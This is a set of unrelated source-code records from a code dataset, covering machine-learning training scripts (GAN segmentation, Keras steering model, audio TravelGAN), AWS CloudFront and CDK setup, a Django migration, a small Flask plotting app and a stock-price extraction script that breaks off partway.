1\n\n if i % num_discri == 0:\n # ----------------------------------\n # Train Segmentation Generator\n # ----------------------------------\n model_segment_encoder.train()\n model_segment_decoder_seg.train()\n model_segment_decoder_region.train()\n gan_r1.toggle_grad(model_segment_encoder, True)\n gan_r1.toggle_grad(model_segment_decoder_seg, True)\n gan_r1.toggle_grad(model_segment_decoder_region, True)\n gan_r1.toggle_grad(model_discriminator, False)\n optimizer_segment.zero_grad()\n \n # get segmentation result\n code = model_segment_encoder(imgs_input)\n imgs_seg = model_segment_decoder_seg(code)\n imgs_roi, imgs_bg = model_segment_decoder_region(code)\n validity_fake = model_discriminator(imgs_seg)\n loss_seg = ms_seg_loss.mumford_shah_seg_loss(imgs_roi, imgs_bg, imgs_seg, imgs_input, validity_fake, gamma1_tv_seg, gamma2_tv_region)\n loss_seg.backward()\n optimizer_segment.step()\n num_iters_seg += 1\n\n # threshold the segmentation result\n imgs_seg = (imgs_seg > t).float() * 1\n imgs_gt = (imgs_gt > t).float() * 1\n \n # ---------------------\n # Get Results\n # ---------------------\n # Compute metric score\n metric_iou = metric_seg.evaluate_iou(imgs_seg, 
imgs_gt)\n print('[*TRAIN*][Epoch {}/{}] [Batch {}/{}] [Discri loss: {}] [Seg loss: {}] [IoU: {}]'.format(epoch+1, num_epoch, i+1, len(loader_train), loss_discri.item(), loss_seg.item(), metric_iou))\n\n losses_discri.append(loss_discri.item())\n losses_seg.append(loss_seg.item())\n train_iou.append(metric_iou)\n scores_sum_iou += metric_iou\n with open(csv_losses, 'a', newline='') as f:\n writer_losses = csv.writer(f)\n writer_losses.writerow([epoch+1, i+1, loss_discri.item(), loss_seg.item()])\n with open(csv_metric_train, 'a', newline='') as f:\n writer_train = csv.writer(f)\n writer_train.writerow([epoch+1, i+1, metric_iou])\n \n # -----------------------------------------\n # Plot images to monitor training\n # -----------------------------------------\n if num_iters_seg == 0 or (num_iters_seg * num_discri) % monitor_interval == 0:\n # plot images\n overlapped = torch.zeros(num_plot_img, 3, imgs_seg.size(2), imgs_seg.size(3))\n overlapped[:,0,:,:] = imgs_gt[:num_plot_img].squeeze(1)\n overlapped[:,1,:,:] = imgs_seg[:num_plot_img].squeeze(1)\n \n plot_segmented = imgs_seg.cpu().detach().numpy()\n plot_gt = imgs_gt.cpu().detach().numpy()\n plot_input = imgs_input.cpu().detach().numpy()\n plot_prior = imgs_prior.cpu().detach().numpy()\n plot_roi = imgs_roi.cpu().detach().numpy()\n plot_bg = imgs_bg.cpu().detach().numpy()\n\n plot_segmented = vutils.make_grid(torch.from_numpy(plot_segmented[:num_plot_img]), padding=2, pad_value=1)\n plot_gt = vutils.make_grid(torch.from_numpy(plot_gt[:num_plot_img]), padding=2, pad_value=1)\n plot_input = vutils.make_grid(torch.from_numpy(plot_input[:num_plot_img]), padding=2, pad_value=1)\n plot_prior = vutils.make_grid(torch.from_numpy(plot_prior[:num_plot_img]), padding=2, pad_value=1)\n plot_roi = vutils.make_grid(torch.from_numpy(plot_roi[:num_plot_img]), padding=2, pad_value=1)\n plot_bg = vutils.make_grid(torch.from_numpy(plot_bg[:num_plot_img]), padding=2, pad_value=1)\n\n imgs = [[plot_segmented, plot_gt, plot_input], [plot_prior, plot_roi, plot_bg]]\n imgs_list = [plot_segmented, plot_gt, plot_input, plot_prior, plot_roi, plot_bg] # flat the list imgs\n img_names = ['segmented', 'ground truth', 'input image', 'prior', 'foreground', 'background']\n fig, axes = plt.subplots(len(imgs), len(imgs[0]), figsize=(18,9))\n for plot_i, ax in enumerate(axes.flat):\n ax.axis(\"off\")\n ax.set_title(img_names[plot_i])\n ax.imshow(np.transpose(imgs_list[plot_i],(1,2,0)), vmin=0.0, vmax=1.0)\n if plot_i + 1 == len(imgs_list):\n break\n plt.show()\n file_name = '{}/results_train'.format(output_dir)\n fig.savefig(file_name, bbox_inches='tight', pad_inches=0.1)\n plt.clf()\n plt.close()\n\n # Plot loss & metric score curves\n curve_titles = [\n \"Discriminator Loss\",\n \"Segmentation Loss\",\n \"IoU - Train (Iteration)\"\n ]\n curve_data = [[losses_discri], [losses_seg], [train_iou]]\n curve_labels = [[\"loss_discriminator\"], [\"loss_seg\"], [\"iou\"]]\n curve_xlabels = [\"iterations\", \"iterations\", \"iterations\"]\n curve_ylabels = [\"loss\", \"loss\", \"score\"]\n curve_filenames = [\"lr-curve-discri\", \"lr-curve-seg\", \"iou-train-iter\"]\n\n for i_curve, curve_data in enumerate(curve_data):\n plt.figure(figsize=(10,5))\n plt.title(curve_titles[i_curve])\n for i_curve_data, curve_data_item in enumerate(curve_data):\n plt.plot(curve_data_item,label=curve_labels[i_curve][i_curve_data])\n plt.xlabel(curve_xlabels[i_curve])\n plt.ylabel(curve_ylabels[i_curve])\n plt.legend()\n file_name = '{}/{}'.format(output_dir, curve_filenames[i_curve])\n plt.show()\n 
plt.savefig(file_name, bbox_inches='tight', pad_inches=0.1)\n                plt.clf()\n                plt.close()\n\n    # get epoch avg iou\n    epoch_avg_iou = scores_sum_iou/num_iters_seg\n    train_epoch_avg_iou.append(epoch_avg_iou)\n\n    # track the best epoch avg iou\n    if epoch == 0:\n        train_best_epoch_avg_iou = [epoch_avg_iou, epoch + 1]\n    else:\n        if train_best_epoch_avg_iou[0] < epoch_avg_iou:\n            train_best_epoch_avg_iou = [epoch_avg_iou, epoch + 1]\n            with open(txt_scores_train, 'r+') as f:\n                f.write('*************[Train Epoch Average Best IoU]*************' + os.linesep)\n                f.write('best iou : {} ([epoch]{})'.format(train_best_epoch_avg_iou[0], train_best_epoch_avg_iou[1]) + os.linesep)\n\n    # plot epoch avg iou\n    plt.figure(figsize=(10,5))\n    plt.title(\"IoU - Train (Epoch Avg)\")\n    plt.plot(train_epoch_avg_iou,label=\"iou\")\n    plt.xlabel(\"epochs\")\n    plt.ylabel(\"score\")\n    plt.legend()\n    file_name = '{}/iou-train-epoch-avg'.format(output_dir)\n    plt.show()\n    plt.savefig(file_name, bbox_inches='tight', pad_inches=0.1)\n    plt.clf()\n    plt.close()\n\n    # ================================================\n    # Validation\n    # ================================================\n    val_scores_sum_iou = 0\n    num_iters_val = 0\n    model_discriminator.eval()\n    model_segment_encoder.eval()\n    model_segment_decoder_seg.eval()\n    model_segment_decoder_region.eval()\n    with torch.no_grad():\n        for i, data_input in enumerate(loader_val, 0):\n            imgs_input = Variable(data_input[0].type(Tensor)).to(device)\n            imgs_gt = Variable(data_input[1].type(Tensor)).to(device)\n\n            # get segmentation mask\n            code = model_segment_encoder(imgs_input)\n            imgs_seg = model_segment_decoder_seg(code)\n            imgs_roi, imgs_bg = model_segment_decoder_region(code)\n\n            num_iters_val += 1\n\n            imgs_seg = (imgs_seg > t).float() * 1\n            imgs_gt = (imgs_gt > t).float() * 1\n            # compute IoU between the thresholded prediction and the ground truth\n            metric_iou = metric_seg.evaluate_iou(imgs_seg, imgs_gt)\n\n            # Collect score info\n            val_iou.append(metric_iou)\n            with open(csv_metric_val, 'a', newline='') as f:\n                writer_val = csv.writer(f)\n                writer_val.writerow([epoch+1, i+1, metric_iou])\n            \n            val_scores_sum_iou += metric_iou\n\n            # track the best validation iou\n            if (epoch == 0) and (i == 0):\n                val_best_score_iou = [metric_iou, epoch+1, i+1] \n            else:\n                if val_best_score_iou[0] < metric_iou:\n                    val_best_score_iou = [metric_iou, epoch+1, i+1]\n\n            # -----------------------------------------\n            # Plot images to monitor validation\n            # -----------------------------------------\n            if num_iters_val == 0 or num_iters_val % monitor_interval == 0:\n                print('[*VAL*][Epoch {}/{}] [Batch {}/{}] [IoU: {}]'.format(epoch+1, num_epoch, i+1, len(loader_val), metric_iou))\n\n    # plot metric score curve\n    plt.figure(figsize=(10,5))\n    plt.title(\"IoU - Val (Iteration)\")\n    plt.plot(val_iou,label=\"iou\")\n    plt.xlabel(\"iterations\")\n    plt.ylabel(\"score\")\n    plt.legend()\n    file_name = '{}/iou-val-iter'.format(output_dir)\n    plt.show()\n    plt.savefig(file_name, bbox_inches='tight', pad_inches=0.1)\n    plt.clf()\n    plt.close()\n\n    # get epoch avg iou\n    val_avg_epoch_iou = val_scores_sum_iou/num_iters_val\n    val_epoch_avg_iou.append(val_avg_epoch_iou)\n    \n    # plot epoch avg iou\n    plt.figure(figsize=(10,5))\n    plt.title(\"IoU - Val (Epoch Avg)\")\n    plt.plot(val_epoch_avg_iou,label=\"iou\")\n    plt.xlabel(\"epochs\")\n    plt.ylabel(\"score\")\n    plt.legend()\n    file_name = '{}/iou-val-epoch-avg'.format(output_dir)\n    plt.show()\n    plt.savefig(file_name, bbox_inches='tight', pad_inches=0.1)\n    plt.clf()\n    plt.close()\n\n    # 
======================================================\n # Save Model by the Best Validation IoU Score\n # ======================================================\n if epoch == 0:\n val_best_epoch_avg_iou = [val_avg_epoch_iou, epoch+1]\n else:\n if val_best_epoch_avg_iou[0] < val_avg_epoch_iou:\n val_best_epoch_avg_iou = [val_avg_epoch_iou, epoch+1]\n dir_save_model = '{}/trained_model_by_best_val_iou.pth'.format(output_dir)\n torch.save({\n 'epoch': epoch,\n 'model_discriminator': model_discriminator.state_dict(),\n 'model_segment_encoder': model_segment_encoder.state_dict(),\n 'model_segment_decoder_seg': model_segment_decoder_seg.state_dict(),\n 'model_segment_decoder_region': model_segment_decoder_region.state_dict(),\n }, dir_save_model)\n print('[*] model is saved by best val iou score')\n with open(txt_scores_val, 'r+') as f:\n f.write('*************[Val Epoch Average Best IoU]*************' + os.linesep)\n f.write('best iou : {} ([epoch]{})'.format(val_best_epoch_avg_iou[0], val_best_epoch_avg_iou[1]) + os.linesep) \n\n\n","sub_path":"train_shape_seg.py","file_name":"train_shape_seg.py","file_ext":"py","file_size_in_byte":23138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"370533309","text":"import lux\nfrom lux import Parameter\n\n\nclass Extension(lux.Extension):\n _config = [\n Parameter('SERVER_CONFIGURATION', 'nginx_reverse_proxy', ''),\n Parameter('DOMAIN_NAME', None,\n 'Full domain name of your web site, e.g. '\n 'http://www.example.com')\n ]\n","sub_path":"lux/extensions/deploy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"631364854","text":"\n# coding: utf-8\n\n# In[185]:\n\nimport cv2\nimport numpy as np\nimport csv\nimport os\nimport matplotlib.pyplot as plt\nimport sklearn\nfrom sklearn.model_selection import train_test_split\nimport itertools\nfrom PIL import Image\nimport math\nimport zipfile\nimport io\nimport time\nimport copy\n\nfrom keras.models import Sequential\nfrom keras.models import load_model\nfrom keras.layers import Dense, Dropout, Flatten, Lambda, ELU\nfrom keras.layers import Cropping2D\nfrom keras.layers import BatchNormalization, Input\nfrom keras.layers.convolutional import Convolution2D\nfrom keras.layers.pooling import MaxPooling2D\nfrom keras.optimizers import Adam\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.backend import tf as ktf\n\n\n# In[186]:\n\n# This notebook is able to run in both jupyter (interactive mode) and \n# floydhub (imperative mode).\n\ndef runin_jupyter():\n try:\n get_ipython().magic('matplotlib inline')\n except NameError:\n return False\n return True\n\nif runin_jupyter():\n INPUT_ZIPS = ['./new_data/turn2d.zip']\n TMP_DIR = '/tmp/'\n OUTPUT_DIR = './'\n LOAD_MODEL = 'model2_turn2.h5'\nelse:\n # Useful for floydhub.\n INPUT_ZIPS = ['/input/udacity.zip', 'turn1.zip']\n TMP_DIR = '/tmp/'\n OUTPUT_DIR = '/output/'\n LOAD_MODEL = False\n\nprint('Input zips:', INPUT_ZIPS)\nDELTA = 0.1\nprint('Delta:', DELTA)\nprint('Load previous model:', LOAD_MODEL)\nSWING_THRESHOLD = 0.1\nprint('Swing threshold:', SWING_THRESHOLD)\n\n\n# In[187]:\n\n# Extract zips to temp folder.\nTMP_DIRS = []\ntic = time.time()\nfor zipf in INPUT_ZIPS:\n with zipfile.ZipFile(zipf, 'r') as z:\n base = os.path.splitext(os.path.basename(zipf))[0]\n target_dir = os.path.join(TMP_DIR, base)\n print('Extracting to:', target_dir)\n TMP_DIRS.append(target_dir)\n 
z.extractall(target_dir)\nprint('Time in unzip:', time.time() - tic)\n\n\n# In[188]:\n\nclass Sample:\n def __init__(self, path, category, angle, flipped=False):\n self.path = path\n self.category = category # 0 - center, 1 - left, 2 - right\n self.angle = angle\n self.flipped = flipped\n \n def getX(self):\n image = Image.open(self.path)\n X = np.asarray(image)\n if self.flipped:\n X = np.fliplr(X)\n return X\n \n def getY(self):\n DELTAS = [0.0, -DELTA, DELTA] # center, left, right\n y = self.angle + DELTAS[self.category]\n if self.flipped:\n y = -y\n return y\n \n def getRawY(self):\n return self.angle * (-1 if self.flipped else 1)\n\nclass DrivingLog:\n \"\"\"\n DrivingLog transforms input files into training/validation/test data.\n It's a data container, the only purpose is to provide these data after\n construction.\n \n Constructor parameters:\n input_dirs: the folders that contain driving_log.csv.\n delta: adjustment of left / right camera angle.\n batch_size: batch size of data generator.\n \n Exposed members:\n train_gen, train_size: training data generator and # of samples.\n valid_gen, valid_size\n test_gen, test_size\n train_samples\n \"\"\"\n \n def __init__(self, input_dirs, batch_size):\n samples = []\n for input_dir in input_dirs:\n csvf = open(os.path.join(input_dir, 'driving_log.csv'), 'r')\n reader = csv.reader(csvf, delimiter=',')\n rows = [row for row in reader]\n samples.extend(self.__process_rows(rows, input_dir))\n \n samples = self.__augment(samples)\n \n # Split to training/validation/test data.\n np.random.shuffle(samples)\n train_samples, valid_samples = train_test_split(samples, test_size=0.2)\n valid_samples, test_samples = train_test_split(valid_samples, test_size=0.5)\n \n self.train_size = len(train_samples)\n self.valid_size = len(valid_samples)\n self.test_size = len(test_samples)\n \n self.train_gen = self.__generator(train_samples, batch_size)\n self.valid_gen = self.__generator(valid_samples, batch_size)\n self.test_gen = self.__generator(test_samples, batch_size)\n \n self.train_samples = train_samples\n \n def __augment(self, samples):\n aug = []\n # Flip the image.\n for s in samples:\n new = copy.deepcopy(s)\n new.flipped=True\n aug.append(new)\n return samples + aug\n \n def __process_rows(self, rows, input_dir):\n samples = []\n for row in rows:\n assert len(row) >= 4\n for i in range(3):\n s = row[i].strip()\n imgf = os.path.join(input_dir, 'IMG', os.path.basename(s))\n new_sample = Sample(path=imgf, category=i,\n angle=float(row[3]))\n samples.append(new_sample)\n return samples\n \n def __generator(self, samples, batch_size):\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates \n total_secs = 0\n np.random.shuffle(samples)\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n\n images = []\n angles = []\n tic = time.time()\n for batch_sample in batch_samples:\n X = batch_sample.getX()\n y = batch_sample.getY()\n images.append(X)\n angles.append(y)\n total_secs += time.time() - tic\n\n Xs = np.array(images)\n ys = np.array(angles)\n yield sklearn.utils.shuffle(Xs, ys)\n print('Total seconds in generator:', total_secs)\n\n\n# In[189]:\n\nBATCH_SIZE = 32\n\ndriving = DrivingLog(input_dirs=TMP_DIRS, batch_size=BATCH_SIZE)\n\nprint('Batch size:', BATCH_SIZE)\n\n\n# In[190]:\n\nprint('Sizes of data: training %d validation %d test %d' % \n (driving.train_size, driving.valid_size, driving.test_size))\n\nif runin_jupyter():\n y_train = [s.getRawY() for s in 
driving.train_samples]\n print('Histogram of steering angles')\n plt.hist(y_train, bins=64)\n \n n_zero = sum(1 for y in y_train if abs(y) < SWING_THRESHOLD)\n print('Zero fraction in angles:', n_zero * 1.0 / len(y_train),\n 'with threshold:', SWING_THRESHOLD)\n \n\n\n# In[191]:\n\nprint('Preview one sample:')\nbatch = next(driving.train_gen)\nx = batch[0][0]\ny = batch[1][0]\n\nprint('shape:', x.shape, 'angle:', y)\nif runin_jupyter():\n plt.imshow(x)\n\n\n# In[192]:\n\n# Creates the deep learning keras model.\n# The input must have the same shape as origional image because we want\n# to use provided drive.py directly to run the car in self-driving mode.\n\nORIG_SHAPE = (160, 320, 3) # row, col, channel\n\ndef course_model():\n print('Course Model')\n model = Sequential()\n model.add(Cropping2D(cropping=((50,20), (0,0)), input_shape=ORIG_SHAPE))\n model.add(Lambda(lambda x: x / 127.5 - 1.0))\n model.add(Flatten())\n model.add(Dense(1))\n # model.summary()\n model.compile(optimizer=\"adam\", loss=\"mse\")\n return model\n\ndef nvidia_model():\n print('Nvidia Model')\n model = Sequential()\n model.add(Cropping2D(cropping=((50,20), (0,0)), input_shape=ORIG_SHAPE))\n model.add(Lambda(lambda x: x / 127.5 - 1.0))\n model.add(Convolution2D(24, 5, 5, border_mode='valid', activation='relu',\n subsample=(2,2)))\n model.add(Convolution2D(36, 5, 5, border_mode='valid', activation='relu',\n subsample=(2,2)))\n model.add(Convolution2D(48, 5, 5, border_mode='valid', activation='relu',\n subsample=(2,2)))\n model.add(Convolution2D(64, 3, 3, border_mode='valid', activation='relu'))\n model.add(Convolution2D(64, 3, 3, border_mode='valid', activation='relu'))\n model.add(Flatten())\n model.add(Dense(1164, activation='relu'))\n model.add(Dense(100, activation='relu'))\n model.add(Dense(50, activation='relu'))\n model.add(Dense(10, activation='relu'))\n model.add(Dense(1, activation='tanh'))\n # model.summary()\n model.compile(optimizer=\"adam\", loss=\"mse\")\n return model\n\n# https://github.com/commaai/research/blob/master/train_steering_model.py\ndef comma_model():\n print('Comma Model')\n model = Sequential()\n # Crop the input image.\n model.add(Cropping2D(cropping=((50,20), (0,0)), input_shape=ORIG_SHAPE))\n model.add(Lambda(lambda x: x / 127.5 - 1.0))\n model.add(Convolution2D(16, 8, 8, subsample=(4, 4), border_mode=\"same\"))\n model.add(ELU())\n model.add(Convolution2D(32, 5, 5, subsample=(2, 2), border_mode=\"same\"))\n model.add(ELU())\n model.add(Convolution2D(64, 5, 5, subsample=(2, 2), border_mode=\"same\"))\n model.add(Flatten())\n model.add(Dropout(0.2))\n model.add(ELU())\n model.add(Dense(512))\n model.add(Dropout(0.5))\n model.add(ELU())\n model.add(Dense(1))\n # model.summary()\n model.compile(optimizer=\"adam\", loss=\"mse\")\n return model\n\n\n# In[193]:\n\n# Model selection.\nmodel = comma_model()\n\n\n# In[194]:\n\n# Training.\nEPOCH = 1\n\nif LOAD_MODEL:\n model = load_model(LOAD_MODEL)\n\nmodel.fit_generator(generator=driving.train_gen, samples_per_epoch=driving.train_size,\n nb_epoch=EPOCH,\n validation_data=driving.valid_gen, nb_val_samples=driving.valid_size)\nmodel.save(os.path.join(OUTPUT_DIR, 'model.h5'))\n\n\n# In[195]:\n\n# Testing.\ntest_loss = model.evaluate_generator(driving.test_gen, val_samples=driving.test_size)\nprint('Test loss:', test_loss)\n\n\n# In[196]:\n\n# Convert to model.py and save to floydhub folder.\nif runin_jupyter():\n get_ipython().system('jupyter nbconvert --to script model.ipynb && mv model.py floydhub/')\n\n\n# In[ 
]:\n\n\n\n","sub_path":"floydhub/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"92707557","text":"import boto3\nimport time\n\n\ndef make_config(origin_domain, origin_id, access_id, path='/'):\n return {'Aliases': {'Quantity': 0},\n 'CacheBehaviors': {'Quantity': 0},\n 'CallerReference': str(time.time()),\n 'Comment': '',\n 'CustomErrorResponses': {'Quantity': 0},\n 'DefaultCacheBehavior': {'AllowedMethods': {'CachedMethods': {'Items': ['HEAD',\n 'GET'],\n 'Quantity': 2},\n 'Items': ['HEAD', 'GET'],\n 'Quantity': 2},\n 'Compress': False,\n 'DefaultTTL': 86400,\n 'FieldLevelEncryptionId': '',\n 'ForwardedValues': {'Cookies': {'Forward': 'none'},\n 'Headers': {'Items': ['Access-Control-Request-Headers',\n 'Access-Control-Request-Method',\n 'Origin'],\n 'Quantity': 3},\n 'QueryString': False,\n 'QueryStringCacheKeys': {'Quantity': 0}},\n 'LambdaFunctionAssociations': {'Quantity': 0},\n 'MaxTTL': 31536000,\n 'MinTTL': 0,\n 'SmoothStreaming': False,\n 'TargetOriginId': origin_id,\n 'TrustedSigners': {'Enabled': False, 'Quantity': 0},\n 'ViewerProtocolPolicy': 'redirect-to-https'},\n 'DefaultRootObject': '',\n 'Enabled': True,\n 'HttpVersion': 'http2',\n 'IsIPV6Enabled': True,\n 'Logging': {'Bucket': '',\n 'Enabled': False,\n 'IncludeCookies': False,\n 'Prefix': ''},\n 'OriginGroups': {'Quantity': 0},\n 'Origins': {'Items': [{'CustomHeaders': {'Quantity': 0},\n 'DomainName': origin_domain,\n 'Id': origin_id,\n 'OriginPath': path,\n 'S3OriginConfig': {'OriginAccessIdentity': f'origin-access-identity/cloudfront/{access_id}'}}],\n 'Quantity': 1},\n 'PriceClass': 'PriceClass_All',\n 'Restrictions': {'GeoRestriction': {'Quantity': 0, 'RestrictionType': 'none'}},\n 'ViewerCertificate': {'CertificateSource': 'cloudfront',\n 'CloudFrontDefaultCertificate': True,\n 'MinimumProtocolVersion': 'TLSv1'},\n 'WebACLId': ''}\n\n\n\nclass CloudFront:\n def __init__(self, proj, stage, path='/'):\n self.cf = boto3.client('cloudfront')\n self.proj = proj\n self.stage = stage\n self.path = path\n\n def _create_access_identity(self):\n name = f\"access-identity-{self.proj}-{self.stage}\"\n resp = self.cf.create_cloud_front_origin_access_identity(\n CloudFrontOriginAccessIdentityConfig={\n \"CallerReference\": str(time.time()),\n \"Comment\": name}\n )\n access_id = resp['CloudFrontOriginAccessIdentity']['Id']\n return access_id\n\n def _create_distribution(self, origin_domain, origin_id, access_id):\n cfg = make_config(origin_domain, origin_id, access_id, path=self.path)\n resp = self.cf.create_distribution(DistributionConfig=cfg)\n return resp['Distribution']\n\n def create_distribution_s3(self, bucket_name):\n o_domain = f\"{bucket_name}.s3.amazonaws.com\"\n o_id = f\"S3-{bucket_name}\"\n access_id = self._create_access_identity()\n return self._create_distribution(o_domain, o_id, access_id)\n","sub_path":"hatano/cloudfront.py","file_name":"cloudfront.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"361111027","text":"from data import AudioData\nfrom trainer import TravelGAN\nfrom torch.utils.data.dataloader import DataLoader\nfrom utils import get_device, load_json, get_writer\nfrom statistics import mean\nimport numpy as np\n\n\ndef train_model(row_dataset_a, row_dataset_b, hparams, log, device=0):\n\n device = get_device(device)\n print('Loading data..')\n L = hparams[\"L\"]\n\n 
dataset_a = AudioData(row_dataset_a)\n dataset_b = AudioData(row_dataset_b)\n\n loader_a = DataLoader(dataset_a, **hparams['loading'])\n loader_b = DataLoader(dataset_b, **hparams['loading'])\n print(f'Shape of dsA: {dataset_a.data.shape}')\n print(f'Shape of dsB: {dataset_b.data.shape}')\n\n model = TravelGAN(**hparams['model'], L=L, device=device)\n model.double()\n writer, monitor = get_writer(log)\n print('Start training..')\n\n for epoch in range(hparams['n_epochs']):\n # Run one epoch\n dis_losses, gen_losses = [], []\n for x_a, x_b in zip(loader_a, loader_b):\n # Loading on device\n x_a = x_a.to(device, non_blocking=True)\n x_b = x_b.to(device, non_blocking=True)\n\n # Calculate losses and update weights\n dis_loss = model.dis_update(x_a, x_b)\n gen_loss = model.gen_update(x_a, x_b)\n dis_losses.append(dis_loss)\n gen_losses.append(gen_loss)\n\n # Logging losses\n dis_loss, gen_loss = mean(dis_losses), mean(gen_losses)\n writer.add_scalar('dis', dis_loss, epoch)\n writer.add_scalar('gen', gen_loss, epoch)\n print(monitor.format(epoch, gen_loss, dis_loss))\n\n # Saving model every n_save_steps epochs\n if (epoch + 1) % hparams['n_save_steps'] == 0:\n model.save(log, epoch)\n\n return model\n\n\nif __name__ == '__main__':\n\n dsA = np.load(r'./samples/mellog_shaped_digits.npy')\n dsB = np.load(r'./samples/mellog_shaped_men.npy')\n\n train_model(dsA, dsB,\n hparams=load_json('./configs', 'audata_conf'),\n log='logging')\n\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"390562702","text":"#!/usr/bin/env python3\n\nfrom aws_cdk import core\nfrom awsomepipeline.application_stack import WebAppStack\nfrom awsomepipeline.pipeline_stack import PipelineStack\nfrom awsomepipeline.vpc_stack import VpcStack\nimport os\n\nenv=core.Environment(\n account=os.environ[\"CDK_DEFAULT_ACCOUNT\"],\n region=os.environ[\"CDK_DEFAULT_REGION\"])\n\napp = core.App()\n\ncontext = app.node.try_get_context(\"stack\")\n\nstack_vpc = VpcStack(app,\"awsome-vpc\", env=env)\n\nif context == \"prd\":\n WebAppStack(app, \"awsome-prd\", vpc=stack_vpc.vpc, env=env)\nelif context == \"stg\":\n WebAppStack(app, \"awsome-stg\", vpc=stack_vpc.vpc, env_level=\"stg\", env=env)\nelif context == \"pipeline\":\n PipelineStack(\n app,\n \"AWSome-pipeline\",\n git_token_key=\"my_secret_token\",\n github_branch=\"master\",\n github_owner=\"enricopesce\",\n github_repo=\"AWSome-pipeline\",\n env=env\n )\nelse:\n print(\"Please define the stack context: prd | stg | pipeline. 
e.g. --context stack=pipeline\")\n\napp.synth()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"190241062","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('userprofile', '0005_auto_20150608_1133'),\n    ]\n\n    operations = [\n        migrations.AlterField(\n            model_name='payment',\n            name='date',\n            field=models.DateField(default=datetime.date(2015, 6, 22), help_text='The payment occurred on this date.', verbose_name='Date'),\n            preserve_default=True,\n        ),\n    ]\n","sub_path":"userprofile/migrations/0006_auto_20150622_1745.py","file_name":"0006_auto_20150622_1745.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"411776941","text":"import flask\nfrom flask import Flask, render_template,url_for,request,send_file\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport csv\nimport numpy as np\napp = Flask(__name__)\nfile = pd.read_csv('2019.csv')\n@app.route('/')\ndef home():\n    return render_template('home.html')\n@app.route('/Analysis')\ndef Analysis():\n    file = pd.read_csv('2019.csv')\n    plt.title('World happiness report 2019 based on score')\n    y=file['Score']\n    x=file['Country or region']\n    N=len(x)\n\n    plt.xticks(np.arange(0,N,2)) \n    plt.scatter(x,y,color='yellow')\n\n    plt.setp(plt.gca().get_xticklabels(),\n             rotation=90,\n             horizontalalignment='right',\n             fontsize=10)\n    # write the rendered figure to disk so send_file has a current image to return\n    plt.savefig('analysis.png')\n    return send_file('analysis.png')\n    \n\nif __name__ == '__main__':\n    app.run(debug=True, port=8080)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"326008108","text":"#!/usr/local/bin/python3\n\n\"\"\" Extracts current stock prices.\n    Each output line will consist of:\n    <ticker>|<price>|<class>\n\"\"\"\n\nimport argparse\nimport os\n\nDELIMITER = '|'\nCAPS = [\n    (100, '100-inf'),\n    (75, '75-100'),\n    (50, '50-75'),\n    (40, '40-50'),\n    (30, '30-40'),\n    (25, '25-30'),\n    (20, '20-25'),\n    (15, '15-20'),\n    (10, '10-15'),\n    (5, '5-10'),\n    (0, '0-5'),\n]\nMAX_DATE = '2013-10-25'\nMIN_DATE = '2013-10-18'\n\ndef get_class(v):\n    for cap in CAPS:\n        thresh, cls = cap\n        if v > thresh:\n            return cls\n    assert False\n\ndef update_map(m, cls):\n    if cls in m:\n        m[cls] += 1\n    else:\n        m[cls] = 1\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--ticker_file', required=True)\n    parser.add_argument('--price_dir', required=True)\n    parser.add_argument('--price_file', required=True)\n    args = parser.parse_args()\n\n    with open(args.ticker_file, 'r') as fp:\n        tickers = fp.read().splitlines()\n\n    cls_map = dict()\n    output_lines = []\n    for i in range(len(tickers)):\n        ticker = tickers[i]\n        print('%d/%d: %s' % (i+1, len(tickers), ticker))\n        price_file = '%s/%s.csv' % (args.price_dir, ticker)\n        if not os.path.isfile(price_file):\n            print('Price data does not exist for %s' % ticker)\n            continue\n        with open(price_file, 'r') as fp:\n            lines = fp.read().splitlines()\n        assert len(lines) > 0\n        assert lines[0] == 'Date,Open,High,Low,Close,Volume,Adj Close'\n        if len(lines) <= 1:\n            print('No price data available for %s' % ticker)\n            continue\n        d, o, h, l, c, v, a = lines[1].split(',')\n        assert d <= MAX_DATE\n        if d < MIN_DATE:\n            print('No recent price data 
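The Flask app in the main.py record above renders through the global pyplot state and a shared file on disk. A hedged alternative sketch (not the record's code) that renders per request into a BytesIO buffer with the non-interactive Agg backend:

# Render a chart per request into memory instead of a shared file; the Agg
# backend is safe in server processes that have no display attached.
import io
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
from flask import Flask, send_file

app = Flask(__name__)

@app.route("/chart")
def chart():
    fig, ax = plt.subplots()
    ax.plot([1, 2, 3], [4, 1, 7])
    buf = io.BytesIO()
    fig.savefig(buf, format="png")
    plt.close(fig)  # release the figure so memory does not grow per request
    buf.seek(0)
    return send_file(buf, mimetype="image/png")

if __name__ == "__main__":
    app.run(port=8081)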
